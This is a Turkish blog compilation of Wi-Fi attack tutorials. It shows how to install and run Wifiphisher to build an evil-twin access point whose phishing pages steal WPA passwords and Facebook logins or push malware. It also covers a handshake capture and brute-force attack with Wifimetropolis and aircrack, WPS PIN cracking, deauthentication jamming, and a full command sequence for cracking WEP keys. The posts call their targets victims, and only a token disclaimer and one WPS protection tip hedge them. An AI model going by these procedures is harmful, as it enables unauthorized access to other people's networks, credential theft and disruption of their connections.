 Kurban Gerçekci Özel Olarak Özelleştirilmiş Bir Kimlik Avi Sayfasini Görür. Wifiphisher, HTTP Ve HTTPS İsteklerine Cevap Veren Minimal Bir Web Sunucusu Kullanmaktadir. Kurban, İnternetten Bir Sayfa İstediğinde, Wifiphisher Kimlik Bilgilerini İster Malware Hizmeti Veren Gerçekci Bir Sahte Sayfa İle Cevap Verecektir. Bu Sayfa Özellikle Kurban İçin Hazırlanacak. Örneğin, Yönlendirici Yapılandırma Görünümlü Bir Sayfa, Kurbanin Sağlayicisinin Logolarini İçerecektir. Araç Farkli Kimlik Avi Senaryolari İçin Topluluk Tarafindan Oluşturulmuş Şablonlari Desteklemektedir.


GEREKSİNİMLER
Wifiphisher'dan En İyi Şekilde Yararlanmak İçin Aşağidakiler Gereklidir:

İnsanlar Diğer Dağıtımlarda Wifiphisher'i Çalıştirmasina Rağmen, Kali Linux Resmi Olarak Desteklenen Dağıtım Olduğundan, Tüm Yeni Özellikler Öncelikle Bu Platform Üzerinde Test Edilmiştir.
Ap Modunu Destekleyen Bir Kablosuz Ağ Adaptörü. Monitör Modunu Destekleyen Ve Enjeksiyon Yapabilen Bir Kablosuz Ağ Adaptörü. Sürücüler Netlink'i Desteklemelidir. 
İkinci Bir Kablosuz Ağ Bağdaştiricisi Yoksa, Araci --nojamming Seçeneğiyle Çalıştırabilirsiniz. 

KURULUM

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher/
sudo python setup.py install
İnstall Yazmayi Unutmayin Ben Gibi :) 

Kurulum İşlemini Gerçekleştirdiktan Sonra Yeni Terminal Açın Yada Açmayın Siz Bilirsiniz :)
Benim İkinci Bi Kablosuz Ağ Adabötürüm Olmadığı İçin wifiphisher --nojamming Yazarak Başlatıyorum Aracı.



Çevremdeki Yayın Yapan Ağları Taramaya Başladı. Hedefi Yön Tuşlarıyla (Yukari Aşaği) Seçerek Enterliyoruz.


Ardından Böyle Bi Sayfa Karşılıyor Bizi


Buradan Wifiphsherde Bulunan Mevcut Phising Senaryolari Var Buradan İstediğinizi Seçin Ben 1 Numarayı Seçtim.

Yukaridaki Metnin Translate Edilmiş Hali Aşağidaki Gibidir. :
Mevcut fisingleme senaryoları
1. üretici yazılımı güncelleme sayfası
Logolar veya markalar olmadan, WPA / WPA2 şifresi isteyen bir yönlendirici yapılandırma sayfası, bir bellenim yükseltmesi nedeniyle. Mobil cihazlara uygun.

2. ağ yöneticisi bağlan
Ağ yöneticisinin davranışını taklit eder. Bu şablon, chrome'un bağlantı başarısız sayfasını gösterir ve ön paylaşımlı anahtar isteyen sayfada bir ağ yöneticisi penceresi görüntüler. Şu anda ağ yöneticileri windows ve mac os ara desteklenmektedir.

3. 0Auth giriş sayfası
Oauth kullanarak kimlik doğrulaması yapmak için facebook kimlik bilgilerini isteyen ücretsiz bir wifi servisi

4. tarayıcı eklentisi güncellemesi
Kurbanlara yükler sunmak için kullanılabilen genel bir tarayıcı eklentisi güncelleme sayfası

+ Kullanmak istediğiniz senaryonun (num) numarasını seçin:

Senaryomuzu Seçtikten Sonra Wifiphisher Aracı Bizim İçin Gerekli Ayaarlamalari Yapıyor Sahte Wifi Ağını Oluşturuyor Ve Gerçek Ağın Bağlantısını Kesmeye Çalısıyor.
Gördüğünüz Gibi Ağın Aynısını Oluşturmus Hiç Bi Fark Yok.

Şimdi Buradan Sonrasını Teknik Bi Ariza Nedeniyle Gösteremıyorum Ama Yapıcak Birşey Kalmadı Zaten Kurban Bizim Ağa Bağlandıgında Wifi İçin Upgrade Ve Parola İsteyecek Bilgileri Girdiğinde Programa Düşecek Bilgiler.

Umarım Anlaşılır Olmuştur.

TrazeR Sunar //


Wifislax Wifi Metropolis 3 İle Wifi Hacking

Selamun Aleyküm

WifiSlax İşletim Sisteminde Bulunan Wifimetropolis 3 (Gui wpa/web & wps) İle Wpa Hacking Yapımını Gösterdim Bu Aracın Özelliği Wordlisti Kendi Oluşturuyor
 Oluşan Wordlisti Ayni Anda Aircrack İle Denemesini Sağlıyor Siz Handshakeyi Yakaladıktan Sonra Oluşak Wordlistin En Az Kaç, En Çok Kaç Haneden Ve Hangi Harf Rakamdan Oluşacağını Belirttikten Sonra Şifre Denemelerine Başlıyor.


Sol Alta Bulunan Ayarlar Butonuna Tıklayarak Resimdeki İşaretlenmiş Kısımlardan Aracımıza Ulaşıp Açıyoruz.

Bu Kısımdan Ağ Kartimi Monitör Moduna Alıyoruz Ardından 2 İle Belirtiğim Yerden Scanner Butonuna Basıyoruz

Scanner Butonuna Bastıktan Sonra ALL Butonuna Basarak Bütün Ağları Listelemesini İstiyoruz
Buradan Hedef Belirttikten Sonra ctrl + c Tusuyla Yada Ok İle Belirtilen Yerden X 'e Basarak Kapatiyoruz.

Kapattıktan Sonra Hedefimizin İsmine Bi Kez Tıklıyoruz Tıkladıktan Sonra Hedefin AP NAame Kısmında Olduguna Dikkat Edin. Buradaki Hedef WPA Olduğu İçin WPA Butonuna Tıklıyoruz

Buradan Capture Data 'ya Basıyoruz Handshake Yakalaması Icın Beklıyoruz


Yakalamazsa 2 İle Belirtiğim DesAutenticacion Butonuna Basarak Yakalaması Icın Bekliyoruz.

Bütün Kullanicilari Düşürerek Handshake Yakaladi. Artık Bu Pencereyi Kapatiyoruz.

Bu Kısımdan Aircrack + Crunch Butonuna Tıklayarak Bi Wordlist Belirtiyoruz. Ben Burada 0123456789ABCDEF ... Kullanarak Sifre Oluşturmasını İstiyorum Siz Sadece Sayilardan Oluşmasini İstiyorsanız 0123456789 'u Seçmelisiniz. Wordlisti Seçtikten Sonra Crunch Yazan  Yerin Yanindaki Kutucuklardan Oluşacak Olan Wordlistin En Az Kaç Ve En Çok Haneden Oluşacağını Belirtikten Sonra Aircrack NG Butonuna Basarak Sözlük Saldirimizi Başlatıyoruz.

Sözlük Saldırımız Başladı Rastgele Şifreler Üreterek Deniyor Şuanda Şifreyi Buldugu Zamanda İse Bu Ekranda Yani Current passphrase Kısmında Key Found Olarak Gösteriyor.




TrazeR Sundu //
ip adresi

WifiSlax GoyScrpit WPS Hack



 Wi-Fi Protected Setup (WPS) Bilgisiz Kullanıcıların Router Ve Wlan Modemlerde
Kolaylıkla Kablosuz Ağ Ayarlarını Yapmaları İçin Tasarlanmış Bir Teknolojidir.

Bu Teknoloji Çıktığında Başladı Güvenlik Zafiyeti (:  
WPS Açığı Bulunan Modemlerde 8 Haneli PİN Numarası Vardır
Dolasıyla Bu Pin Numarasını Bulduğunuz, Kırdığınız Zaman Size Otomatikman Wi-fi Şifresinide Veriyor. Siz Dilediğiniz Kadar Büyük Küçük Harf ,Rakam Oluşan Bi Şifre Oluşturun Modeminiz WPS Destekli İse Şifrenizi Kolaylıkla Elde Edebilirler.






Korunmak İçin : WPS Kapatın, Yazılım Güncellemesi Yapın En Azından 60 Sn Koruması Sağlar.
ip adresi

Wifi Jammer Websploit

Meraba Arkadaşlar Bu Yayınımda Sizlere Kali Linux Üzerinde Wifi Jammer Kullanımı Gösterdim. Wifi Jammer : Websploit Wifi Jammer Modulü Hedeflenen Kablosuz Ağ Ve Erişim Noktasına Bağlanan Her İstemcinin Bağlantısını Kesmek İçin Kullanılan Güzel Zevkli Bi Araçdır.

Kali Linux'da Yeni Terminal Açıp : 











   Jammerimizi Kapatınca Direk Bağlandı.


Wireless Şifre Kirmak Wifi Hack Resimli Anlatim

Meraba Arkadaşlar Bugün Size WEB Wifi Hack'i Kendimce Anlatmaya Çalıştim Biraz Aceleye Geldi İdare Edin (: Faydali Olmasi Dileğiyle ... Bu KONUMUZDA Sizlere Wmware Work Station 10 Üzerinde Kali Linux Kurulumundan Bahsetmiştim. Şimdi İse Kali Linuxta Şifreleme Türü WEB Olan Ağların Nasıl Şifrelerinin Elde Edilebileceğini Anlatıcam. Tabikide Bilgi Amaçlıdır. 


Videolu Anlatım : 



Resimli Anlatım:  
  1.komut :" iwconfig"


2.komut:"ifconfig"wlan0 HWaddr:00:25:22:4c:50:17 yazan bölüm bizim MAC adresimiz.

 

3.Komut:"airmon-ng start wlan0" Bu Komut İle Ağ Kartimizi Aktif Hale Getiriyoruz. (Monitor Mode Enabled on mon0)

 

4.Komut :"airodump-ng mon0"Komutu İLe Çevremizdeki Wifi Ağlarin Essid (İSMİ) BSSİD (Mac Adresi) CH (Yayin Yaptiği Kanal Numarasi)ni görebiliriz. Buradan Kendimize Şifreleme Türü WEB Olan Bi Hedef Seçiyoruz Hedefimizin Mac (BSSİD) CH(Kanal NO) Aliyoruz notepad dosyasına kaydediyoruz. (Ben Guvenlik İçin Bssid Ve Essid'i Gizledim.)

 

5.Komut:"airodump-ng -c 6 --bssid 00:00:XX:XX:XX:XX hedef mac --ivs -w deneme mon0"yada hedef modem ismini yaz mon0 enter.Burdaki -c Hedefin yayin yaptiği kanal numarasi. örn: "airodump-ng -c 6 --bssid 11:22:33:23:83:44 --ivs -w wifihack mon0" burdaki "wifihack" yazisi toplayacak olan paket dosyamizin adi "wifihack" bu dosyada başlangıç klasorüne kayit edilecek otomatik olarak.

 

6.Komut:Trafik Oluşturma. "aireplay-ng -1 2 -o 10 -q 10 -a hedef mac adresini yaz buraya -h kendi mac adresini buraya yaz mon0" Örn:aireplay-ng -1 2 -o 10 -q 10 -a 00:00:XX:XX:XX:XX -h 00:25:22:4c:50:17 mon0"

 

7.Komut:Yeni Bir Konsol Açıp Şu Komutlari Yaziyoruz:"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b hedef mac adresi -h bizim mac adresi mon0" Örn:"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:XX:XX:XX -h 00:25:22:4c:50:17 mon0"

 

8.Komut:Bu Kisimda Yapmamiz Gereken Paket Toplamasini Beklemek Yeteri Kadar Paket Topladiğinda Şifre Kirma İşlemimiz Kisa Sürede Sonuç Verecektir.

 

9.Komut: En Sevdiğim Kısım (: Yeni Bi Terminal Açıyoruz Ve "aircrack-ng -a 1 wifihack-01.ivs" Yaziyoruz Ve Topladiğimiz Paketleri Kirmaya Başlıyoruz. Hatirlarsaniz 5. Komutta Dosya İsmimizi "wifihack" Olarak Belirtmiştik Bu Yüzden 5.Komutta Vericeğiniz İsmi Unutmayiniz Unutursanizda Zaten Başlangıç Klasoründe Olucaktir (:

 

10.Komut: aircrack-ng -a 1 wifihack-01.ivs

 

Ve İşte Kirilan Şifremiz KEY FOUND! [* *: * *: * *: 9 9:9 9:] Aralarindaki : İşaretlerini Silin Ve Bağlanin.. Yakinda Hanshake Yakalayarak WPA WPA2 Hack'i Anlaticağim Takipte Kalin. Yapamayan Hata Alan Yorum Yapsın Yardimci Olalim.
ip adresi